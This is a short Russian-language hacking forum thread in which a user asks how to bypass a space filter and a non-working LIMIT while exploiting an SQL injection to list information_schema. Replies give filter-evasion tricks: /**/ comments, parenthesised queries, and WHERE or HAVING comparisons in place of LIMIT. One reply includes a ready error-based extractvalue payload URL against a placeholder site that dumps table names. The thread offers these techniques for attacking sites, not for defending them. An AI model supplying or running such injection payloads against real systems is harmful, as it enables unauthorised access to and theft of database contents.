Как обойти/заменить limit?

Discussion in 'Песочница' started by Tyc00n, 21 Jun 2012.

  1. Tyc00n

    Tyc00n Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    30
    Likes Received:
    25
    Reputations:
    -1
    Есть скуль, вырезаются пробелы, вместо этого использую скобки (). 5ая версия, хочу пролистать information_schema , но при написании limit(1,1) ничего не выводит, group_concat'ом только первые несколько записей видно, мне их не хватает, подскажите что можно сделать? Условия where работают нормально
     
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    817
    Reputations:
    605
    /**/ ни кто не отменял....]

     
    _________________________
    4 people like this.
  3. Tyc00n

    Tyc00n Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    30
    Likes Received:
    25
    Reputations:
    -1
    Не работает тоже :)
     
  4. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    566
    Likes Received:
    289
    Reputations:
    42
    В чем проблема юзать безпробельно group_concat в связке скажем с mid или substring

    синтаксис при инъекции в рерайте(для примера error-based extractvalue)

    site.com/123'and(extractvalue(1,concat(0x3a,select(mid(group_concat(table_name),1,32))from(information_schema.tables)where(table_schema!='information_schema')))))and'​

    Также, например, можно использовать where как лимит

    select(schema_name)from(information_schema.schemata)where(schema_name>'information_schema')​

    /**/ при скули в рерайте не заюзать, также как и прочие фишки с юрленкодом
     
  5. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    limit хорошо можно заметь через where или having!
     
Loading...